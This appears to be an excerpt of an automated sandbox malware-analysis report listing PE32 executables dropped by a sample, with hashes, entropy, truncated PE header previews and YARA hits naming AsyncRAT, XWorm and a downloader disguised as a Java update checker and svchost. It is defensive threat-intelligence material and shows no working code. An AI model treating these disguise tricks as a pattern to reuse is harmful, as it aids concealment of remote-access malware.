                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):582184
                                      Entropy (8bit):6.398834596152969
                                      Encrypted:false
                                      SSDEEP:6144:Pu0LWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:PLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                      MD5:897450E53986279D2B04BA53B52BDDD8
                                      SHA1:94C242D856D91F902792EF4B390A65847321632F
                                      SHA-256:07648CB2CA34B1C0F75971AE97F941AB50AE25F76429AFD4CBF1895B0269D24E
                                      SHA-512:72A40CC08748BBAEE3E5B06EFA0F123F2C20A793B5862473EB972CA68F39474A89D4BF9DD0250321DC32D80AD8ADE6A0D52CCE978B5DC0AD1421E6213DA42C98
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3837992
                                      Entropy (8bit):6.444733046079261
                                      Encrypted:false
                                      SSDEEP:49152:BB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:NHzorVmr2FkRpdJYolA
                                      MD5:32890A1EABD25D9DAFC948F5146EE430
                                      SHA1:228A82E420134C823B26445D3124DEA5575E68B4
                                      SHA-256:3701476504BE77805D33A9E809A5D42C10170D5342C9D6DD2B546EB8D44F9005
                                      SHA-512:9B1B651AFB2C5DAFA5D3A0D48ADE18F90BC370F183C0884F21C1EC2454F015DEEFF627F091AD1C73341EEDD2F5C7D291DF2CAB0E6B23A8C5F52E2DE2DD3E0C6A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):161832
                                      Entropy (8bit):6.14756500825813
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCJ2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:PuYVSktVjv3Xg5T0FIY6
                                      MD5:04EF9F4C747D7E6688BA9F35B8E3D8BA
                                      SHA1:24E64BAC23BC510711460C2B33130FF4C1CDCE05
                                      SHA-256:3D1421240FCFD07D5084ED9D4B33A5DFFADE81CE7912EE0BE4A2E4437857B642
                                      SHA-512:BA8C839D6CA820B5DA5E1864564355EDB1628811B34FDFAAF54C0505D2971892C6CE3783FF4F2DA8BEC0A346BE733570BF50CD86B2726249AAF3DA611470B993
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1827880
                                      Entropy (8bit):6.540156971587151
                                      Encrypted:false
                                      SSDEEP:24576:nhDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:nhDdVrQ95RW0Y9HyWQXE/09Val0GE
                                      MD5:879742EC86106257BEA934DBE9B820B4
                                      SHA1:2D0D374FE06464FE3DEF4C6025BF2C5246572C03
                                      SHA-256:8AFF66C49C009D187109D8B38F826731B88C832B976767C41F73EA4C7972CF2C
                                      SHA-512:B7DD56A683CFB81DE96408F4D973EF9EB8201E5A2C574954487E152945D87CBCD5CF81D9567B09378E7737FA47B31AB29DCD03BE846DABAF164E3530639FCE36
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1297448
                                      Entropy (8bit):6.513926743108373
                                      Encrypted:false
                                      SSDEEP:12288:3doA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:370E0ZCQZMip6Rrt9RoctGfmdd0
                                      MD5:C46EECCF6FAE76F11358D0E43965681C
                                      SHA1:9ED2788370B6F5B476C7E6000058BE7D5EBEDA6E
                                      SHA-256:5804894F3F60DA262589131E6B7A1CEA7D5B1023993ABBAD2253C12526914D8E
                                      SHA-512:C36F36F16CFE7AA0A39353F45931B3B64D7E1168C8DCF61FB7A116612CB24A54E281D4D616EC21D6117118B03A0F03AEF8EFD91CFD5483EB6B6776C7A50EFED9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4251688
                                      Entropy (8bit):6.506317829104403
                                      Encrypted:false
                                      SSDEEP:49152:bpawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:QehFLvTQDpB5oSOmlBl
                                      MD5:6D080AAFAA8CE83776195B5B124103FF
                                      SHA1:8C8809935FA73EB7A18FBD8023B0636765DA9C09
                                      SHA-256:6AF714C0C52FE584E9B4E9EF39D4DE723C509BF9082476BA3C5B97DCB2D3E4F3
                                      SHA-512:F7C81889032AFFD9BF288A4B34ECD026B9EC6E5BF74D3D4EFF229029D63B33B26CD0B178AD95FD6BE728414882678F8E36C0C1373D21A32367E9508CCCE7EB25
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1319976
                                      Entropy (8bit):6.503786677710061
                                      Encrypted:false
                                      SSDEEP:12288:Uyeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:UiD2VmA1YXQHwlklb8boUuWPg2gX
                                      MD5:9CF33C2C22730E0C3C7F65154ABFD0A7
                                      SHA1:7ED4EB14D0A8174B75E4C5F0B06B4DB54F53429F
                                      SHA-256:FA5E80F107D15EA38675A3A544DA56AA245DB5421D64A162ECB4C159A6CBE229
                                      SHA-512:CD21A5AB79A0DDCE0F88C57D3E8E4B56C093B12E6CD74DF3AA234D1EB2C8C1D7E4412083836D102B5E4BB545177EC58D5E8FC21216DAB8AEC92D0D3F02026FAC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2327080
                                      Entropy (8bit):6.530984368082779
                                      Encrypted:false
                                      SSDEEP:24576:yfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:yfD3zO9ZhBGlopzM3HRNr00z
                                      MD5:3332CF2E4E55A3382BC000AD04399C84
                                      SHA1:88E1C5B851AB8F57E50EE2F9AFEDF3CE828FA19E
                                      SHA-256:780A8D096F70BC6FDEEEF05A22C1C943E64C2A3CBE33C6F3600504606D4FCBBB
                                      SHA-512:1CE56E69DB2CA020CCCC036B5F0FC93156F2352420B5F7E3F551230D478AF5470657F81617B45CB32DF98EF9DCBF5254BEB16DC75F43186ECFF2D71740A772B4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3790800
                                      Entropy (8bit):6.537629939786787
                                      Encrypted:false
                                      SSDEEP:49152:GTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:ZI72LvkrCpbxJRoIMx
                                      MD5:391A248273BFC2C0361AE5DFE61F6D1B
                                      SHA1:0BD38C25FE4CC60BCB67ABC8E7407F0135E61FD1
                                      SHA-256:AEF2E2B2AE1722A9D53DF0A40DD3B126AE40DEBB5176C150DA67AA72392AD6DE
                                      SHA-512:B5F345FE14835806C1273DFC6C9C1E993D9EF469E8D146BB466816748A8F432362734B72D9BB79848C2C50AE103273FF723E865C649A53D6D1130A8DEB2003DA
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1535528
                                      Entropy (8bit):6.517119310826715
                                      Encrypted:false
                                      SSDEEP:12288:+406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:HW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                      MD5:20628DE11335D9E9C180E82B8DA8C6F4
                                      SHA1:3214ED9228E71E72D86A3F9ECFB0F3B7A8AEAE8B
                                      SHA-256:1A1CC93F0239D3A342B27EF97020EF7DCC522BE9A8EEC0220C52B69E098EACCD
                                      SHA-512:138B4E13BFDC8ED20854432609FFC90852DF667507D7C0DA77D4F817A32A55D084CEEA30184D9DE444DA5A949665532F021E01BF30D261803DBF31E18BA6A8FE
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273384
                                      Entropy (8bit):6.515185633103735
                                      Encrypted:false
                                      SSDEEP:12288:u5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:uwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                      MD5:DA3D6D82C0A5DAB32AD539A41B2292C9
                                      SHA1:69A16AE6620EBC4E3AB589A77C3875332CD9EFDD
                                      SHA-256:B68881B7F63772E7D7002EF6ADFE43870760808167260F1FE2578808F47F67ED
                                      SHA-512:E75F6C20E0BE447C014874769E9037946DFBD602602AE6A1D5D197504FF5F13D5C6FABA3A93E0658E8B70A66B37790D500DF03D8FA6CA01A21FB08F461F1E74E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4251688
                                      Entropy (8bit):6.506317829104403
                                      Encrypted:false
                                      SSDEEP:49152:bpawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:QehFLvTQDpB5oSOmlBl
                                      MD5:6D080AAFAA8CE83776195B5B124103FF
                                      SHA1:8C8809935FA73EB7A18FBD8023B0636765DA9C09
                                      SHA-256:6AF714C0C52FE584E9B4E9EF39D4DE723C509BF9082476BA3C5B97DCB2D3E4F3
                                      SHA-512:F7C81889032AFFD9BF288A4B34ECD026B9EC6E5BF74D3D4EFF229029D63B33B26CD0B178AD95FD6BE728414882678F8E36C0C1373D21A32367E9508CCCE7EB25
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1319976
                                      Entropy (8bit):6.503786677710061
                                      Encrypted:false
                                      SSDEEP:12288:Uyeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:UiD2VmA1YXQHwlklb8boUuWPg2gX
                                      MD5:9CF33C2C22730E0C3C7F65154ABFD0A7
                                      SHA1:7ED4EB14D0A8174B75E4C5F0B06B4DB54F53429F
                                      SHA-256:FA5E80F107D15EA38675A3A544DA56AA245DB5421D64A162ECB4C159A6CBE229
                                      SHA-512:CD21A5AB79A0DDCE0F88C57D3E8E4B56C093B12E6CD74DF3AA234D1EB2C8C1D7E4412083836D102B5E4BB545177EC58D5E8FC21216DAB8AEC92D0D3F02026FAC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273384
                                      Entropy (8bit):6.515185633103735
                                      Encrypted:false
                                      SSDEEP:12288:u5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:uwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                      MD5:DA3D6D82C0A5DAB32AD539A41B2292C9
                                      SHA1:69A16AE6620EBC4E3AB589A77C3875332CD9EFDD
                                      SHA-256:B68881B7F63772E7D7002EF6ADFE43870760808167260F1FE2578808F47F67ED
                                      SHA-512:E75F6C20E0BE447C014874769E9037946DFBD602602AE6A1D5D197504FF5F13D5C6FABA3A93E0658E8B70A66B37790D500DF03D8FA6CA01A21FB08F461F1E74E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):225232
                                      Entropy (8bit):5.9169842072110015
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCFcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:PuFcwVz4B8c37KoNX1q
                                      MD5:B50DDBDB05BF0BB57476EA6C5A032B2D
                                      SHA1:75D97A80167D3AB18ECA1B1A990B894F691584B2
                                      SHA-256:5074A5357D42806C87926B169CD558E653349DF7E44354EC85460C0A2C95C50B
                                      SHA-512:FA6DBD13E3E85C5098B6A866E7F399AECDCD4FDD53ED3F60F9EE20F8ABC156F2F272B155B5BCD79F4424E89C8045094560575CBA622327D6661A4947D7D35D46
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):247760
                                      Entropy (8bit):5.766587112108476
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCQW4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcf:Puml/DRfkTC3dM7B+mCivAT
                                      MD5:886E05881670C2B29D17DF6823B38A66
                                      SHA1:4CB79B5F1DA8FE8079518B65FFFDB99EB0A3D76F
                                      SHA-256:AEEB4BAAD144DB01611C82FA0D8F0029F3EF777101740829E7F6D8D453E31D6D
                                      SHA-512:9FFF6FA38B694ABC945F515A78CFA793D6AB8E7977A2973A5B69265A965DFC76C6A77D48366D5A98EB4D4460A878BE02C95C828066E42FB3F4F64CCD30D93987
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142288
                                      Entropy (8bit):6.418539700023223
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCs684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:PuQrTB+AleYIkifYUF
                                      MD5:3856508A91D399E375B350B0C1423FFD
                                      SHA1:9747673D2FAF4EC499A05B3DFB80431029C17507
                                      SHA-256:B7E5B278ECB57EDBF3C121517B5CBE0B37C29D7A1F9BE1E121776C59B39F3E37
                                      SHA-512:77037E2A7F8A466D85F3A5CD2C19DA8D9795297BACA6477D8B39C29D7CBAE8641D6CE300F59035A674F749002B79199211C2955936AEB4DA0C7C6CDAB8636A1D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):259024
                                      Entropy (8bit):6.086004749509324
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCTXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:PuTUVwleMITTmNv1ohWsqYI354I
                                      MD5:C37E3B17146D3DF38E578862AEA8C6AC
                                      SHA1:4587242D000A11BF98779F074BB15989A9E57AC2
                                      SHA-256:FE9F873C55826F1C1CA88289966923B9B6FB330C2B46261B682584711B0A35D8
                                      SHA-512:D28917D093AF944094FF56D5712CC0AC9BBCE3337A524E9B95487510CF5ACD2608EA7914CCA920CA9BE5AA7F6CA808B920AEE6D596ECD74DB3B2551BC77047D2
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):305120
                                      Entropy (8bit):6.411066493542914
                                      Encrypted:false
                                      SSDEEP:6144:PumFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:vKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                      MD5:A44E4ED52DB101B90FC40FBD77EE5813
                                      SHA1:E1EA013D66084E842EE75CDF1A20F2C5C7C1D920
                                      SHA-256:A107A456D15142E351FA622010D0F75EDD8E331C147DF974A5EF1D8889700749
                                      SHA-512:30EBA6D8ECA2E67D40DA256558E758EE5A457E40E2D4A1CA1FFA175E063B6983F23210E35F7BA857E0F87A550511C8C5AE7F748D90B37F847432DC60B6916C0F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142288
                                      Entropy (8bit):6.419211340608754
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCDaivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:PujzB+Aw4CZNr2fYLl
                                      MD5:66668951BA49BF63140B9DC5384B12FF
                                      SHA1:864CF0FC89B1EC2FC0F7F86231001C606D95C626
                                      SHA-256:316FB2C43692DD48BF49D92F62393E1FEF23A024776398E25B5B08F2CB7601F0
                                      SHA-512:523138612680231D11AAC37F70C649334D8070D263DFA87A6DE9863C5C0A4E0AD6805F02EA29ABB99645CF55A3312B9101C0B06935F416BA5F33BFD8BC42E930
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1640416
                                      Entropy (8bit):7.91251877420056
                                      Encrypted:false
                                      SSDEEP:24576:dwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:Cy53w24gQu3TPZ2psFkiSqwozX
                                      MD5:352C6224D8440DF99EC9BCB6D1205994
                                      SHA1:6E0D04A6F207B83B385F09F43E1C1AA4519399A6
                                      SHA-256:5F579E51C94992CFD86C111D09F84E328F373073903E51D7C02AC77697D682EF
                                      SHA-512:9175FB5E4524C95C706C4147B700155BD551842F2890D737C635DF8B684585AAFF2E41EC2B81BA0BA941ADCDB51BFA9DAE09C2440E4B5EAEA9524462F0ADF08A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):144866
                                      Entropy (8bit):6.2324558335577
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCkRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:PuGD5lZ7y4j9KT4DteUY
                                      MD5:D709786C68534D0465D77BDE302F7065
                                      SHA1:6E113BCB0876FDDDC39B31D1F364AC1C3B0F9B40
                                      SHA-256:8F98C63531C25555C4ED421DC87B670C763690A82E9B2D76A59D2233AC500636
                                      SHA-512:47295791D6181ABB9F777E85ADE7425A34C497A5E4E5B483104DE6105D9CE49D9FD7A342BE5B469528176DB4E63D0A5117F9E6C969B999B7F87FE1076DB14B86
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):280480
                                      Entropy (8bit):6.382752729567392
                                      Encrypted:false
                                      SSDEEP:6144:Pu6Pr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:7DQXRVTZu0GP+ZR
                                      MD5:25156B6B2ACFE0D4284F3842C0F1FD9F
                                      SHA1:C3C3387E29A3C045104FBA65357B73D36CB72F96
                                      SHA-256:1F32EEC314E0AEE4B61FAEE41B8D2D882AA49E3D49906E2F91FD842C574D2E17
                                      SHA-512:77B19A7D771681CC8AF1456013761626620EBCA8B336BD728ACE88B67E7E8D20812918BB588B5D06EF1E722607442ACECAF0BCD2274C912520F3125517157ECC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):46592
                                      Entropy (8bit):5.848041824576861
                                      Encrypted:false
                                      SSDEEP:768:B68rPcT5+tkzOGvAX8WuFZ4hJF5PC9O9W68OMhl3/OV/8:08r8ItiOeW894Fc9UW68OM3eE
                                      MD5:9F4FFCEB9E7905107492815B7EBFDC13
                                      SHA1:417E66C983CE65D0588CAB57EBDAD317A9FEF818
                                      SHA-256:6FB45016BB75A9968AE3ADC15A03B8C2E94BD22342F306F1E52A03BF498D5AF9
                                      SHA-512:E724C98562C96CB5F8AEC64167DFC122FA005AF06D1A4A20DC58549D20966DA0B722D58C16330785B8AF2435A199436DD1723AECC21FA127A65B4A8F44452357
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: ditekSHen
